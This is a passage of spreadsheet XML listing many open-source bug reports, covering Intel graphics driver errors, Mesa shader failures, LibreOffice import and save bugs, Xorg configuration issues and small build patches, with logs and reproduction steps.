tag : 13.0-branchpoint-931-g7a2cfd4
commit : 7a2cfd4 
Component : xf86-video-intel
tag : 2.99.917-736-gbde9460
commit : bde9460 
Component : libva
tag : libva-1.7.2-44-g598fb9e
commit : 598fb9e 
Component : intel-driver
tag : 1.7.2-189-gce55d7e
commit : ce55d7e 
Component : cairo
tag : 1.15.2-75-g3f1a6f7
commit : 3f1a6f7 
Component : xserver
tag : xorg-server-1.19.0-3-gcf88607
commit : cf88607 
Component : macros
tag : util-macros-1.19.0-2-gd7acec2
commit : d7acec2 
Component : intel-gpu-tools
tag : intel-gpu-tools-1.16-156-gcddf996
commit : cddf996 
Component : rendercheck
tag : rendercheck-1.5-9-g44032a7
commit : 44032a7
Additional Info:
===================================================
Dmesg relevant information:
[  109.243947] [drm:generic_exec_sequence [i915]] Starting MIPI sequence 10 - MIPI_SEQ_POWER_ON
[  109.244012] [drm:mipi_exec_gpio [i915]] 
[  109.244035] [drm:mipi_exec_gpio [i915]] GPIO element not supported on this platform
[  109.244058] [drm:mipi_exec_delay [i915]] 
[  109.249309] [drm:intel_dsi_pre_enable [i915]] 
[  109.383519] [drm:dpi_send_cmd.constprop.8 [i915]] *ERROR* Video mode command 0x00000042 send failed.
These IGT tests are also failing dur to the same issue:
kms_pipe_crc_basic@suspend-read-crc-pipe-a -&gt; dmesg-fail
kms_pipe_crc_basic@suspend-read-crc-pipe-b -&gt; dmesg-fail
kms_pipe_crc_basic@suspend-read-crc-pipe-c -&gt; dmesg-fail
gem_exec_suspend@basic-s3 -&gt; fail</t>
  </si>
  <si>
    <t>MESA-29684</t>
  </si>
  <si>
    <t>[glsl] wine shaders break with mesa GLSL</t>
  </si>
  <si>
    <t>Every wine program or game using shaders that I have tried fail to render using the new GLSL compiler (all of them black screens) all of them run correctly using either the proprietary driver or disabling GLSL on wine (which makes wine use assembly shaders) most of them didn't work with the old GLSL compiler either so not much of a regression.
Graphics Card: ATI Technologies Inc RV505 [Radeon X1550 64-bit]
CPU: Intel Core Duo 1.8 Ghz 2.5 GB RAM
Linux kernel 2.6.34 libdrm 2.4.21
Using MESA_GLSL=dump shows that many shaders fail to compile the error messages seem to be always one of these:
Cannot access field `xy' of non-structure / non-vector.
(caused by this line of code: gl_TexCoord[0].xy = clamp(OUT[0].xy -FLT_MAX FLT_MAX)
and
vector index must be &lt; 4
(caused by the line gl_Position.xyzw = clamp(OUT[10].xyzw -FLT_MAX FLT_MAX))</t>
  </si>
  <si>
    <t>rubenf3000</t>
  </si>
  <si>
    <t>LIBREOFFICE-74553</t>
  </si>
  <si>
    <t>FILEOPEN: Contents of Several Cells Miss if Spreadsheet is an XLS File</t>
  </si>
  <si>
    <t>Created attachment 93436
Example document in order to reproduce the bug.
Problem description: 
Steps to reproduce:
(1) Open attached document with LibreOffice versions 4.2.0 and 4.1.4.
(2) Compare document in both versions: In sheet â€œÃ¼bersichtâ€ the contents of the following cells miss in version 4.2.0: C3:I3 C7:I9 L2:S2 L11:S11 M29:S29 L30:S44.
Expected behavior: No missing of contents.
Operating System: Windows 7
Version: 4.2.0.4 release
Last worked in: 4.1.4.2 release</t>
  </si>
  <si>
    <t>LIBREOFFICE-87798</t>
  </si>
  <si>
    <t>German translation missing for STR_DESC_MODULE_OPTIONAL_OGLTRANS</t>
  </si>
  <si>
    <t>Created attachment 111429
Screenshot showing the untranslated string
During installation of 4.4.0 RC1 an untranslated string is shown. For details see the attached screenshot.</t>
  </si>
  <si>
    <t>simon-eder</t>
  </si>
  <si>
    <t>DRI-100332</t>
  </si>
  <si>
    <t>[BDW][EXT] igt@gem_ringfill tests incomplete</t>
  </si>
  <si>
    <t>On CI 
igt@gem_ringfill@blt-s3
igt@gem_ringfill@bsd2-s3
igt@gem_ringfill@render-child
igt@gem_ringfill@render-s3
incomplete
Eg. 
http://intel-gfx-ci.fi.intel.com/archive/results/CI_IGT_test/igt@gem_ringfill@blt-s3.html</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-72356</t>
  </si>
  <si>
    <t>Let  key on itfr and nl keyboards generate KP_Separator</t>
  </si>
  <si>
    <t>Created attachment 90306
Patch
Notwithstanding the never ending discussion what character this
key on the numeric keypad should produce this key should produce
what is imprinted on the keyboards. After all all three countries
are observing the SI standards.
This makes this layout more consistent and match for instance
what is done in the de layout.</t>
  </si>
  <si>
    <t>XORG-38939</t>
  </si>
  <si>
    <t>Defining Screen 1 before Screen 0 traps cursor on Screen 0</t>
  </si>
  <si>
    <t>Created attachment 48726
This is the full config file for the problematic behavior.
Given (non xinerama) layout:
Section ServerLayout
  Identifier    Composite
  # (A)commented bit works normally (but sucks)
  #Screen 0     Outboard0
  #Screen 1     Internal0 LeftOf Outboard0
  # gives one screen only
  #Screen 0     Internal0
  #Screen 1     Outboard0 RightOf Internal0
  # cursor trapped on Screen 0 but windows can launch on 1 okay
  Screen 1      Outboard0 RightOf Internal0
  Screen 0      Internal0 
EndSection
You get a server where xrandr can see both screens but the cursor cannot traverse into screen 1 by any means. Other combinations work as described and in the uncommented case RightOf Internal0 can be configured contrapositively as LeftOf Outboard0 on the other line with no change in behavior detectable.
As to why I would want to do this... DisplayLink driver is retarded and will not cohabit with my radeon driver unless the display link driver is loaded and initialized first. Since the displaylink device is a tiny outboard touchscreen I don't want it to be screen 0 (because that makes it the main login screen and launcher target which is anti-helpful).
My best guess is that the bounding and whatnot is computed relative to screen 0 and so the dimensions and pointer bounding computed for screen 1 get forgotten when screen 0 is instanced.
(While the real fix would be to get Xorg to stop unloading the DisplayLink driver by default once it sees the radeon device that would be a different bug report for later. _that_ appears to be in the xorg core as well since I coudln't find anything conditional in the displaylink driver but I'm not sure who that bug report goes to yet.)
I know the pointer bounding is affected. I _think_ focus traversal is also affected as the various next window nonsense woudldn't work via KDE etc.
There were no interesting (error or warning) messages in Xorg.0.log and the various bit/color depths and such are resolved in the full config. xrandr -screen 0 and xrandr -screen 1 can see both screens etc.
X.Org X Server 1.10.99.901 (1.11.0 RC 1)
Release Date: 2011-06-01
X Protocol Version 11 Revision 0
Build Operating System: Linux 2.6.39-gentoo x86_64 Gentoo
Current Operating System: Linux gust 2.6.39-gentoo-r2 #1 SMP PREEMPT Sat Jul 2 01:32:11 PDT 2011 x86_64
Kernel command line: BOOT_IMAGE=/boot/vmlinuz-2.6.39-gentoo-r2 root=UUID=95e97343-3aee-4c3e-b8ae-08183121ab3c ro
Build Date: 16 June 2011  11:47:19AM</t>
  </si>
  <si>
    <t>SHARED-MIME-INFO-15852</t>
  </si>
  <si>
    <t>Gnuplot document should be Gnuplot script</t>
  </si>
  <si>
    <t>Gnuplot is a command line program and I presume that application/x-gnuplot is for files which contain Gnuplot commands. A better definition would be:
    Gnuplot script
As a related note scripting language types in general like application/x-php and application/x-perl fit better in the text/* namespace because they are human-readable (I understand the text/* namespace to encompass human-readable text files) but that's probably another bug.</t>
  </si>
  <si>
    <t>tweenk.pl</t>
  </si>
  <si>
    <t>DRI-42021</t>
  </si>
  <si>
    <t>[snb eDP] Failed to train dp on HP all-in-one</t>
  </si>
  <si>
    <t>Created attachment 52558
contains ves and intel configures and logs Xory.0.log intel_reg_dump lshw dump dmesg dump xorg.conf uname dump and grub.conf from the system
HP All-in-one code name Caldwell does not run X when using intel driver. Only VESA driver can load X.  Major issue was lost of XVideo impacts our applications.
Issue is reproducible 100% just load a fedora desktop liveCD in normal mode and you are present with a blank screen.  Same issue with Ubunutu 11.10.
Xorg.0.log shows:
[    14.476] (II) intel: Driver for Intel Integrated Graphics Chipsets: i810
	i810-dc100 i810e i815 i830M 845G 854 852GM/855GM 865G 915G
	E7221 (i915) 915GM 945G 945GM 945GME Pineview GM Pineview G
	965G G35 965Q 946GZ 965GM 965GME/GLE G33 Q35 Q33 GM45
	4 Series G45/G43 Q45/Q43 G41 B43 B43 Clarkdale Arrandale
	Sandybridge Desktop (GT1) Sandybridge Desktop (GT2)
	Sandybridge Desktop (GT2+) Sandybridge Mobile (GT1)
	Sandybridge Mobile (GT2) Sandybridge Mobile (GT2+)
	Sandybridge Server Ivybridge Mobile (GT1) Ivybridge Mobile (GT2)
	Ivybridge Desktop (GT1) Ivybridge Desktop (GT2) Ivybridge Server
[    14.477] (++) using VT number 1
[    14.481] (EE) No devices detected.
[    14.481] 
Fatal server error:
[    14.481] no screens found
[    14.481] 
Please consult the Fedora Project support 
	 at http://wiki.x.org
 for help. 
[    14.481] Please also check the log file at /var/log/Xorg.0.log for additional information.
[    14.481] 
Attached is the log of vesa driver and intel driver.  
System is:
HP All-in-one with core i3-21050 Sandy Bridge (Caldwell)
CPU: core i3-21050 Sandy Bridge
RAM: 4GB
Chipset: H61
Graphics: Intel integrated graphics.
Display: 20 
Resolution: 1600x900
video connection: Its an All-in-one but was told it uses eDP to connect to display.
Linux distribution: Fedora 16 beta also same issue on Ubuntu 11.10 and issue has been observed in older fedora 12 fedora 13and fedora 15. In all cases Vesa driver works and windows 7 works.</t>
  </si>
  <si>
    <t>binh.truong</t>
  </si>
  <si>
    <t>FONTCONFIG-96</t>
  </si>
  <si>
    <t>font-config crashes when the filesystem is write only</t>
  </si>
  <si>
    <t>Here's a patch to fix it.  I don't know if it's the right fix or not.</t>
  </si>
  <si>
    <t>LIBREOFFICE-46112</t>
  </si>
  <si>
    <t>Cell Border double lines imported from old OOo versions</t>
  </si>
  <si>
    <t>Spreadsheet cell borders do not work correctly. Borders using double lines do not show correctly on the screen and do not print correctly. I do not know about other border line styles. The last time this worked properly was version 3.3.4.</t>
  </si>
  <si>
    <t>r_manning6654</t>
  </si>
  <si>
    <t>LIBREOFFICE-81799</t>
  </si>
  <si>
    <t>Clang 3.2 Fails to build LO 4.4 on Ubuntu</t>
  </si>
  <si>
    <t>Created attachment 103530
Build log
Under Ubuntu 13.10 with the default clang 3.2 I can build LO 4.2 and 4.3 but the latest 4.4 fails with the following error:
[build LNK] Library/libavmedialo.so
/home/luke/Downloads/lo/libreoffice/workdir/CxxObject/cppcanvas/qa/extras/emfplus/emfplus.o:
(.data.rel.ro._ZTIN10comphelper16WeakImplHelper32IN3com3sun4star9container6XChildENS3_8document27XDocumentPropertiesSupplierENS6_13XCmisDocumentENS3_3rdf23XDocumentMetadataAccessENS6_17XDocumentRecoveryENS6_20XUndoManagerSupplierENS6_17XEventBroadcasterENS6_25XDocumentEventBroadcasterENS3_4lang14XEventListenerENS6_15XEventsSupplierENS6_16XEmbeddedScriptsENS6_24XScriptInvocationContextENS3_5frame7XModel2ENS3_4util12XModifiable2ENS3_4view10XPrintableENSO_20XPrintJobBroadcasterENSK_10XStorable2ENSK_9XLoadableENS3_6script16XStarBasicAccessENS6_17XViewDataSupplierENSM_10XCloseableENS3_12datatransfer13XTransferableENS6_27XDocumentSubStorageSupplierENS6_21XStorageBasedDocumentENST_8provider23XScriptProviderSupplierENS3_2ui31XUIConfigurationManagerSupplierENS3_5embed13XVisualObjectENSF_10XUnoTunnelENSK_7XModuleENSK_6XTitleENSK_23XTitleChangeBroadcasterENSK_16XUntitledNumbersEEE[_ZTIN10comphelper16WeakImplHelper32IN3com3sun4star9container6XChildENS3_8document27XDocumentPropertiesSupplierENS6_13XCmisDocumentENS3_3rdf23XDocumentMetadataAccessENS6_17XDocumentRecoveryENS6_20XUndoManagerSupplierENS6_17XEventBroadcasterENS6_25XDocumentEventBroadcasterENS3_4lang14XEventListenerENS6_15XEventsSupplierENS6_16XEmbeddedScriptsENS6_24XScriptInvocationContextENS3_5frame7XModel2ENS3_4util12XModifiable2ENS3_4view10XPrintableENSO_20XPrintJobBroadcasterENSK_10XStorable2ENSK_9XLoadableENS3_6script16XStarBasicAccessENS6_17XViewDataSupplierENSM_10XCloseableENS3_12datatransfer13XTransferableENS6_27XDocumentSubStorageSupplierENS6_21XStorageBasedDocumentENST_8provider23XScriptProviderSupplierENS3_2ui31XUIConfigurationManagerSupplierENS3_5embed13XVisualObjectENSF_10XUnoTunnelENSK_7XModuleENSK_6XTitleENSK_23XTitleChangeBroadcasterENSK_16XUntitledNumbersEEE]+0x10): undefined reference to `typeinfo for cppu::OWeakObject'
clang: error: linker command failed with exit code 1 (use -v to see invocation)
make[1]: *** [/home/luke/Downloads/lo/libreoffice/workdir/LinkTarget/CppunitTest/libtest_cppcanvas_emfplus.so] Error 1
make[1]: *** Waiting for unfinished jobs....
make: *** [build] Error 2
$ uname -a
Linux luke-MM061 3.11.0-12-generic #19-Ubuntu SMP Wed Oct 9 16:12:00 UTC 2013 i686 i686 i686 GNU/Linux
$ clang -v
Debian clang version 3.2-7ubuntu1 (tags/RELEASE_32/final) (based on LLVM 3.2)
Target: i386-pc-linux-gnu</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-75867</t>
  </si>
  <si>
    <t>New git repository for libnice</t>
  </si>
  <si>
    <t>libnice has the rest of its project infrastructure already at freedesktop.org can you please create a git repository too.</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-25760</t>
  </si>
  <si>
    <t>NEW Mali Keyboard Layout</t>
  </si>
  <si>
    <t>Created attachment 32247
Mali Layout
There is no keyboard layout to type Mali languages characters easily.
Attached is the Mali layout including a couple variants.
Please note that while I've set name to 'mali' it should be 'ml' but there seem to be a bug somewhere (either freedesktop or gnome keyboard properties) which makes it conflicts with the Malayalam layout: ML is Mali ISO 3166-1 country code and ML is also Malayalam ISO 639-1 language code.
-- bellow is the base layout extract --
        mali
        Mali
        Mali
        bam
            fr
            FranÃ§ais (France)
            fross
            FranÃ§ais (France - Alternative)
            usmac
            English (USA - Macintosh)
            usintl
            English (USA - International)
--</t>
  </si>
  <si>
    <t>rgaudin</t>
  </si>
  <si>
    <t>NICE-22925</t>
  </si>
  <si>
    <t>Build fixes for solaris</t>
  </si>
  <si>
    <t>Created attachment 27974
build fixes for solaris
As can be seen at http://build.gnome.org/builders/libnice-opensol-gcc/builds/2/steps/libnice%20build/logs/stdio libnice doesn't build on Solaris. It also needs some defines for msg_* and CMSG_SPACE.</t>
  </si>
  <si>
    <t>trs80</t>
  </si>
  <si>
    <t>PULSEAUDIO-91174</t>
  </si>
  <si>
    <t>Resource leak: alloc_fd and Resource leak: dev_fd</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-78759</t>
  </si>
  <si>
    <t>Please delete attachment</t>
  </si>
  <si>
    <t>Bug 50322 has an attachment 66912 and consists of data that
should not be on the internet because it is part of a University research
project.  My supervisor googled something in the file and found the file
and was alarmed. Could the attachment (or the bug as a whole if appropriate) be deleted?</t>
  </si>
  <si>
    <t>jon.stammers</t>
  </si>
  <si>
    <t>LIBREOFFICE-71350</t>
  </si>
  <si>
    <t>add Excel 2010 functions CONFIDENCE.NORM and CONFIDENCE.T</t>
  </si>
  <si>
    <t>See meta bug 70798 for links and test files.</t>
  </si>
  <si>
    <t>MESA-94180</t>
  </si>
  <si>
    <t>Vulkan: severe flicker on skl</t>
  </si>
  <si>
    <t>Created attachment 121790
screenshot
As invited by the Vulkan announcement filling (probably) the first Vulkan bug here.
The demos from https://github.com/KhronosGroup/Vulkan-LoaderAndValidationLayers flicker on my system including the triangle one.
Mesa 11.2.0-devel (git-0a3324e) (vulkan branch)
Intel(R) HD Graphics 530 (Skylake GT2)
kernel: 4.4.1</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-83466</t>
  </si>
  <si>
    <t>Remove account for bannerboy at gmail dot com</t>
  </si>
  <si>
    <t>I've had a new e-mail address (jason at jlekstrand dot net) for several years now and ended up creating a new acccount with the new address.  The old account hasn't been used in some time. The only reason why I'm bothering to ask for it to be removed is because sometimes people assign bugs to it by accident.</t>
  </si>
  <si>
    <t>bannerboy</t>
  </si>
  <si>
    <t>XORG-44374</t>
  </si>
  <si>
    <t>VMMouse xorg driver module fails to build using most updated GIT</t>
  </si>
  <si>
    <t>Created attachment 55029
build output i.e. config and make
I'm using the modular build script. When building driver/xf86-input-vmmouse the build fails with the attached output.
./util/modular/build.sh -p --modfile mod_vmmouse --autoresume RESUMEFILEMOUSE -c /opt/xorg-git/xorg-git-install/
mod_vmmouse contains the vmmouse module name
attempted to build on 1 January 2012</t>
  </si>
  <si>
    <t>nolan</t>
  </si>
  <si>
    <t>aetherisreal42</t>
  </si>
  <si>
    <t>DRI-105056</t>
  </si>
  <si>
    <t>HDMI port not working on IntelÂ® Skylake U SoC integrated Graphics</t>
  </si>
  <si>
    <t>Created attachment 137291
output of dmesg
We are running Linux on a EMX-SKLUP machine (https://www.avalue.com.tw/Product/Industrial-PC/Industrial-Motherboard/Thin-Mini-ITX/EMX-SKLUP_2521 )
This machine mounts a graphics card: IntelÂ® Skylake U SoC integrated Graphics and we are using the i915 driver to drive two screens one using the HDMI port and the other using the DisplayPort. 
We tried different kernels and we noticed the following:
1.	Kernel 4.4 ïƒ  all versions work like a charm
2.	Kernel 4.9 ïƒ  all versions before 4.9.30 work. All versions after 4.9.40 have problem with the HDMI port. It simply turns out to be always disconnected when issuing an xrandr. Thus the screen is simply blank. The DisplayPort connection works perfectly. 
We made some narrowing and the problem seems to have been introduced between the following two commits:
â€¢	4.9.30 commit: https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?h=linux-4.9.y&amp;id=db3fd4527ed32be44cbd8ffa6dd6a301c89d0d6d
â€¢	4.9.40 commit: https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?h=linux-4.9.y&amp;id=efcfbfb1d8bf756d1b58fe215bf4e419d176435b
â€¢	diff of i915 dir: https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/diff/drivers/gpu/drm/i915?h=linux-4.9.y&amp;id=db3fd4527ed32be44cbd8ffa6dd6a301c89d0d6d&amp;id2=efcfbfb1d8bf756d1b58fe215bf4e419d176435b
3.	All following kernels  have the same problem.</t>
  </si>
  <si>
    <t>e.deotto</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-90317</t>
  </si>
  <si>
    <t>Add dcbw to the libmbim git ACL</t>
  </si>
  <si>
    <t>Aleksander meant to add me at project creation time but apparently that wasn't communicated in bug 59161.  So I humbly request addition to the ACL thanks!</t>
  </si>
  <si>
    <t>DRI-100362</t>
  </si>
  <si>
    <t>[SNB] gpu hang on ubuntu 14.04 - stuck on render ring</t>
  </si>
  <si>
    <t>Created attachment 130404
from syslog includes trace
Hi
Was seeing a lot of these using chrome with hardware acceleration. Not for a while after starting to use --disable-gpu with chrome.
Just updated chrome from 39.0.2171.95-1 to 57.0.2987.110-1 yesterday and got one of these. Was updated on a lot of machines but so far have only seen 1 hang. Still using  --disable-gpu.
from syslog
Mar 24 06:42:21 cafemedia035 kernel: [ 2522.667382] [drm] stuck on render ring
Mar 24 06:42:21 cafemedia035 kernel: [ 2522.687669] [drm] GPU HANG: ecode 8:0:0xef9ffffd in chrome [2094] reason: Ring hung action: reset
More including trace in attached file gpuhang035-240317.txt</t>
  </si>
  <si>
    <t>paul59584</t>
  </si>
  <si>
    <t>LIBREOFFICE-55931</t>
  </si>
  <si>
    <t>Autofit Text breaks subscript / superscript in Impress</t>
  </si>
  <si>
    <t>Created attachment 68492
Presentation showing the behavior.
See the attached presentation - when you open it the subscript is not readable.  But uncheck the Autofit Text - and voila it appears :-)
The reason is that we are using font metrics to compute the stretch ratio for autofit but that collides with nPropr property of SvxFont - it is then counted twice ie. in the case of nPropr == 25 we actually behave as if it was much less and worse only in the horizontal direction.</t>
  </si>
  <si>
    <t>TELEPATHY-28710</t>
  </si>
  <si>
    <t>Document errors for RequestReceiving</t>
  </si>
  <si>
    <t>From #24936
RequestReceiving takes a handle argument so I think it should be documented to
raise InvalidHandle (if the handle is completely invalid) and InvalidArgument
(if the handle is valid but is not involved in this stream).</t>
  </si>
  <si>
    <t>MESA-104285</t>
  </si>
  <si>
    <t>Euro Truck Simulator 2 and American Truck Simulator artifacts (Mesa 17.3 AMD R9 280X)</t>
  </si>
  <si>
    <t>Created attachment 136213
Example screenshot showing artifacts in game.
After updating Mesa from 17.2.6 to 17.3.0 (using packages from Solus distribution) both ETS2 and ATS started glitching (artifacts around the objects see attached screenshot as example).
Software: Linux 4.14.5 Mesa 17.3.0 LLVM 5.0.0.
Videocard: MSI Radeon R9 280X (using amdgpu kernel module).</t>
  </si>
  <si>
    <t>avvorobyev95</t>
  </si>
  <si>
    <t>LIBQMI-58755</t>
  </si>
  <si>
    <t>Missing man pages</t>
  </si>
  <si>
    <t>There are no man pages for the applications qmicli and qmi-network.</t>
  </si>
  <si>
    <t>LIBREOFFICE-83572</t>
  </si>
  <si>
    <t>Improvements to zoom mode button</t>
  </si>
  <si>
    <t>In the toolbar there is a zoom group button (.uno:ZoomToolBox) which default to zoom in but if you click it it doesnt zoom in. If i enable to the zoom toolbar the same zoom in button still doesnt work.
This effects 4.2.6 4.3.2 and master though the button has been removed from the default toolbar in master.</t>
  </si>
  <si>
    <t>TELEPATHY-23524</t>
  </si>
  <si>
    <t>TpCM can be made to assert in tp_connection_manager_got_protocols</t>
  </si>
  <si>
    <t>For CMs which don't have a .manager file I've seen TpCM assert in tp_connection_manager_got_protocols() namely at:
  g_assert (self-&gt;priv-&gt;found_protocols == NULL)
I believe this is because tp_connection_manager_activate () doesn't guard on self-&gt;priv-&gt;listing_protocols so ListProtocols is called twice.</t>
  </si>
  <si>
    <t>TELEPATHY-29796</t>
  </si>
  <si>
    <t>Extract some non-Gabble-specific base classes for Call-related objects</t>
  </si>
  <si>
    <t>I have been refactoring Gabble's Call implementation a bit. My branch is a work in progress: http://git.collabora.co.uk/?p=user/wjt/telepathy-gabble-wjt.gita=shortlogh=refs/heads/call-base-classes
It depends on bug 29790 and bug 29778 and unfortunately can't be merged as-is because of the bug I haven't fixed I describe in bug 29790.</t>
  </si>
  <si>
    <t>LTSP-10251</t>
  </si>
  <si>
    <t>LTSP</t>
  </si>
  <si>
    <t>ltsp-update-sshkeys doesn't update ssh_known_hosts on symlinked /opt/ltsp</t>
  </si>
  <si>
    <t>Hi
When you customize ltsp by symlinking /opt/ltsp to another dir (i.e. ln -s /srv/ltsp /opt/ltsp) the command ltsp-update-sshkeys doesn't find arch root directories.
As administrator would potentially change ltsp root directory by using symbolic links I think that a good practice would be to terminate all searched directories in find command by a / to be sure it will follows symlinks (the patch below).
diff /usr/sbin/ltsp-update-sshkeys ltsp-update-sshkeys
3c3
&lt; clients=$(find /opt/ltsp -mindepth 1 -maxdepth 1 -type d -printf '%f\n')
---
&gt; clients=$(find /opt/ltsp/ -mindepth 1 -maxdepth 1 -type d -printf '%f\n')
Regards.
Alban.</t>
  </si>
  <si>
    <t>jam</t>
  </si>
  <si>
    <t>alban.bernard</t>
  </si>
  <si>
    <t>WOCKY-49805</t>
  </si>
  <si>
    <t>SSL Wildcard support is too lenient (and a bunch of SSL tests are broken under OpenSSL)</t>
  </si>
  <si>
    <t>The wildcard implementation accepted *oogle.com as well as *.whatever
style wildcards. 
This is a) a time-bomb and b) only required by the HTTP SSL RFC.
Also a bunch of the SSL tests were broken under OpenSSL
they should all work again now.</t>
  </si>
  <si>
    <t>LIBREOFFICE-80721</t>
  </si>
  <si>
    <t>VIEWING: Pilcrow (Non-printable character) not visible at the end of a centered and right-aligned paragraph</t>
  </si>
  <si>
    <t>Created attachment 102023
ODT with left-aligned centered and justified pararaphs.
Problem description:
If a paragraph is centered its pilcrow (Â¶) is not visible.
Steps to reproduce:
1. Show non-printing characters.
2. Type any text.
3. Center the paragraph.
Current behavior:
Â¶ is not visible for centered paragraphs.
It is only visible for left-aligned and justified ones.
Expected behavior:
Â¶ should be visible.
Operating System: Windows 7
Version: 4.3.0.1 rc
Last worked in: 4.2.5.2 release</t>
  </si>
  <si>
    <t>karbock</t>
  </si>
  <si>
    <t>SYNCEVOLUTION-52878</t>
  </si>
  <si>
    <t>CalDAV: Google + Exchange + detached recurrences</t>
  </si>
  <si>
    <t xml:space="preserve">
---- Reported by patrick.ohly@intel.com 2011-08-10 10:33:59 +0000 ----
BUILD IMAGE:         SyncEvolution 1.1.99.5
BUG DETAILED DESCRIPTIONS
===========================================================
Evolution shows detached recurrences twice.
EXACT STEPS LEADING TO PROBLEM:
===========================================================
1. get your Google account invited to a meeting series from someone using Exchange
2. have the organizer modify (not delete!) one recurrence
3. sync with Evolution via CalDAV
EXPECTED OUTCOME:
===================
Regular meeting show except for the one modified recurrence which must show the updated information.
ACTUAL OUTCOME:
===================
Evolution shows the meeting twice on the day of the modified recurrence.
USER IMPACT:
===================
Doesn't know which event is the up-to-date one.
REPRODUCIBILITY:
=====================================
100%
OTHER COMMENTS:
===================
Occurs because the detached recurrence generated this way contains a RECURRENCE-ID in UTC. I suspect that this is legal according to the RFC and that there is an Evolution/libical bug here.
---- Additional Comments From patrick.ohly@intel.com 2011-08-10 10:57:07 +0000 ----
commit c50b45865c5c271b1d3d26cdeb938b8d48f12d0a
Author: Patrick Ohly 
Date:   Wed Aug 10 12:43:44 2011 +0200
    CalDAV: transform UTC RECURRENCE-ID for Evolution (BMC #22594)
    Evolution shows a meeting twice on the day of a modified recurrence
    if the meeting series was originally created and modified in Exchange
    then imported into Google Calendar.
    The reason is that the RECURRENCE-ID in that case ends up being
    in UTC even if the parent event has a time zone. Evolution and/or
    libical seem to have a bug here IMHO they should recognize that the
    RECURRENCE-ID time is the same.
    SyncEvolution now works around this by transforming the UTC
    RECURRENCE-ID time into the time zone of the DTSTART time of the
    parent event. This is combined with removal of X-LIC-ERRORS into
    a new fixIncomingCalendar() method which needs to be called
    whenever a complete VCALENDAR is received from the CalDAV server
    (adding data from a report GET).
    This transformation changes the rid part of the item IDs. It should
    be okay in a two-way sync (remove one sub item add another) and
    a slow sync (libsynthesis recognizes the times as equal).
--- Bug imported by patrick.ohly@gmx.de 2012-07-29 20:36 UTC  ---
This bug was previously known as _bug_ 22594 at https://bugs.meego.com/show_bug.cgi?id=22594
</t>
  </si>
  <si>
    <t>LIBREOFFICE-37825</t>
  </si>
  <si>
    <t>An Opened Encrypted File can't be saved Unencrypted</t>
  </si>
  <si>
    <t>Created attachment 47435
Documents and Screenshots to Demonstrate that once Encrypted the Document can't be saved Unencrypted.
Once a file is encrypted with LibreOffice 3.4.0rc2 (x86 in Vista under Virtual PC on Windows 7 x64) it can be opened but the opened document cannot be Saved unencrypted.  This happens even though the Save As ... dialog has the Save with Password option not checked.
REPRODUCTION
In the attached Zip as follows:
Encryption-2011-05-31-1223-unEncryptable.odt
 is a document that was saved with read-only with protection of change-tracking on and encrypted.  The encryption password is unEncryptable.
Encryption-2011-06-01-0847-unEncryptable.png
 shows the Enter Password for decryption dialog to open 1223-unEncryptable.
Encryption-2011-06-01-0848-unEncryptable.png
 shows the Save As without Save with password attempt to make a new
unencrypted version of the document.
Encryption-2011-06-01-0849 ...
 shows the Document Properties General tab brought up as part of the Save As...
Encryption-2011-06-01-0851 ...
 shows the Document Properties Security tab brough up as part of the Save As...
 Note that the file was set to Open read-only and with Record changes
set Protected but this is not reflected in the greyed out File sharing options.
Encryption-2011-06-01-0836-unEncryptable.odt
 is the document that was saved as the result of the preceding sequence.  The
user did not set the password on this file but it is encrypted anyhow.
Encryption-2011-06-01-0854-unEncryptable.png
 shows the Enter Password dialog that has to be satisfied before the -0836
document will open.  The newly-saved document is encrypted anyhow.
 The unEncryptable password works.
Encryption-2011-06-01-0856 ...
 shows that the read-only condition has been removed however.  Now the File | Properties dialog accurately reflects that Record changes is set and protected.  (I don't remember which password I used to set this.  Try foolish if you want to see if the Unprotect works.)
Encryption-2011-06-01-0868 ...
 shows another attempt to do a Save As this time with the just-opened (and further-edited) -0836 document. Note that Save with password is not checked.
Encryption-2011-06-01-0859 ...
 shows that the Document Properties | Security tab is still for the writeable
document
Encryption-2011-06-01-0900-unEncryptable.odt
 is the new saved document
Encryption-2011-06-01-0901-unEncryptable.png
 shows that the last-saved document is STILL an encrypted one.</t>
  </si>
  <si>
    <t>OPENRASTER-55246</t>
  </si>
  <si>
    <t>libora</t>
  </si>
  <si>
    <t>With libpng &gt;= 1.5 libora won't compile anymore</t>
  </si>
  <si>
    <t>Created attachment 67585
Patch to fix compilation
Hi
using the last development version (9b77a72d3decc2c573e629091c2e40cd59bee147 from 4th of November 2010).
OS: Linux Mageia 2 (64 bits).
libpng version 1.5.10.
When compiling libora I get this error:
[100%] Building C object src/tool/CMakeFiles/oratool.dir/oratool.c.o
/home/jehan/prog/libora/src/tool/oratool.c: In function â€˜tool_write_pngâ€™:
/home/jehan/prog/libora/src/tool/oratool.c:78:9: erreur: â€˜Z_BEST_COMPRESSIONâ€™ undeclared (first use in this function)
/home/jehan/prog/libora/src/tool/oratool.c:78:9: note: each undeclared identifier is reported only once for each function it appears in
/home/jehan/prog/libora/src/tool/oratool.c:81:43: erreur: â€˜Z_DEFAULT_STRATEGYâ€™ undeclared (first use in this function)
make[2]: *** [src/tool/CMakeFiles/oratool.dir/oratool.c.o] Erreur 1
make[1]: *** [src/tool/CMakeFiles/oratool.dir/all] Erreur 2
make: *** [all] Erreur 2
The problem is that until libpng 1.4 libpng would include zlib.png and libora code was relying on it.
The fix is to include this library in libora code to ensure it works with both older and newer versions of libpng.
Patch attached which fixes the compilation.</t>
  </si>
  <si>
    <t>jehan.marmottard</t>
  </si>
  <si>
    <t>XORG-25366</t>
  </si>
  <si>
    <t>PGRAPH_ERROR with Quadro NVS 280 SD (NV17 or NV18)</t>
  </si>
  <si>
    <t>I've upgraded to Fedora 12 recently... As the binary drivers for my old old old card (nvidia_96xx) are not supported yet (or maybe any more -) I've decided to give nouveau a try.
It starts like a charm but shortly after (a few minutes) everything goes bunkers - fonts instead of being black are light grey or pink -) bitmaps are corrupted. In a second I'll attach a screenshot of my screen after about 10-15 minutes.
The kernel (log to be attached as well) is screaming like this:
